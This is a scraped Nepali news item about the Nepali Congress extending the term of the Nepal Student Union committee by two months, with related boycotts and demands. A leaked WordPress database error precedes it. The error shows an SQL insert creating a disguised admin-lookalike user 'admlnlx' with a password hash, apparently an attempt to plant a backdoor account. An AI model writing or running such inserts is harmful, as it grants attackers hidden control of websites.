WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3NdHM40U.fRVcWR0E5320jhuTelCT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 22:53:54', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेपाली कांग्रेसको केन्द्रीय समितिको बैठक सम्पन्न भएको छ । बैठकले नेपाली कांग्रेस निकट भातृसंगगठन नेपाल विद्यार्थी संघको वर्तमान कार्यसमितिको म्याद २ महिना थप्ने निर्णय गरेको छ ।
आइतबार साँझ पार्टी कार्यालयमा बैठकले नैनसिंह महर नेतृत्वको कार्यसमितिको म्याद २ महिना थप्ने निर्णय गरेको हो ।
उक्त निर्णयप्रति असन्तुष्टी जनाउँदै पूर्वमहामन्त्री कृष्णप्रसाद सिटौला र पूर्व सहमहामन्त्री अर्जुननर सिहं केसीले बैठक बहिष्कार गरेका छन् ।
नेविसंघका महामन्त्री कुन्दनराज काफ्लेले संगठनभित्र ३२ वर्षे उमेरहद तत्काल लागू गर्न माग गरेका छन् । उनले आज एक विज्ञप्ति जारी गरी पार्टी नेतृत्वसमक्ष सो माग गरेका हुन् ।